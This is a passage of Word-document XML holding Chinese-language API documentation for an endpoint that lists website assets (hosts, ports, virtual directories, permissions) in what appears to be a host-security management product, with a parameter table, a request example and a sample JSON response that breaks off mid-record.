          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A549426" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/website/{</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux|win</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C45950" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>请求参数：</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1173"/>
        <w:gridCol w:w="1339"/>
        <w:gridCol w:w="630"/>
        <w:gridCol w:w="3471"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BC669E" w14:paraId="11D1677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CA30DEE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>参数</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="465A4252" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FAF1C22" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4BD6FDBF" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="69BE87E4" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="297B53B1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7B4672C2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58AD64ED" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F05BA08" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>唯一标识Agent的ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="6265795D" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D701E81" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>groups</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="614F0B2F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="306CFF7D" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="60922A16" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="42BCA94E" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69EDC9C9" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="62631E87" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F96FA36" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E09A2F0" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机名（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="38316BA3" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AB7E030" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>ip</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B207CE2" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0863D614" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="791866EC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>主机IP（模糊查询）</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="608BCDCE" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5AFB2873" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>port</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="704BB49E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="235D005F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="41E3F070" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>站点端口</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="57903C9B" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6E633EDC" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>proto</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="706F74C1" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7EDF139C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4F003F7B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>站点协议，精确匹配</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="63F23EBA" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5371E7DD" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="53D8F628" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String数组</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="45683373" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="498A913A" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>服务类型，精确匹配，如</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>iis,nginx</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>等</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BC669E" w14:paraId="2B609C33" w14:textId="77777777" w:rsidTr="005C4BFD">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5F5D4B8C" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>rootPath</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="19281BDE" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32C1DD9B" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>否</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="525F4180" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="005C4BFD">
            <w:r>
              <w:t>站点路径，模糊匹配</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="34551C0E" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>请求示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40222286" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>/external/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>/assets/website/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linux?agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=70db8ef89e9ae79a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7893358F" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>返回示例：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="427AA8B5" w14:textId="77777777" w:rsidR="00BC669E" w:rsidRDefault="00BC669E" w:rsidP="00BC669E">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>"total":1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "rows": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>agentId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "c0bb1116dfa69772",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>displayIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.202.147",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>connectionIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.199.16",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>externalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>internalIp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "192.168.202.147",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroupId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bizGroup</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "未分组主机（Linux）",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "remark": "测试接口哦哦11哦",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>hostTagList</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>localhost.localdomain</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "type": "httpd",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "port": 80,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>portStatus</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>securityEnabled</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": false,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "allow": "all",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "deny": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "proto": "http",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "domains": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "name": "*",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "title": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>virtualDir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "path": "",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>physicalPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "/var/www/html",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "owner": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "group": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "permission": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rwxr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-x",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ownerType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>acls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>appPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>appPool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "root": true</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "path": "/icons/",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>physicalPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "/var/www/icons/",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "owner": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "group": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "permission": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rwxr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-x",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ownerType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>acls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>appPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>appPool</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "root": false</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "path": "/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-bin/",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>physicalPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": "/var/www/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cgi</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-bin/",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "owner": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "group": "root",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "permission": "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rwxr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>xr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>-x",</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ownerType</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>acls</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>appPath</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
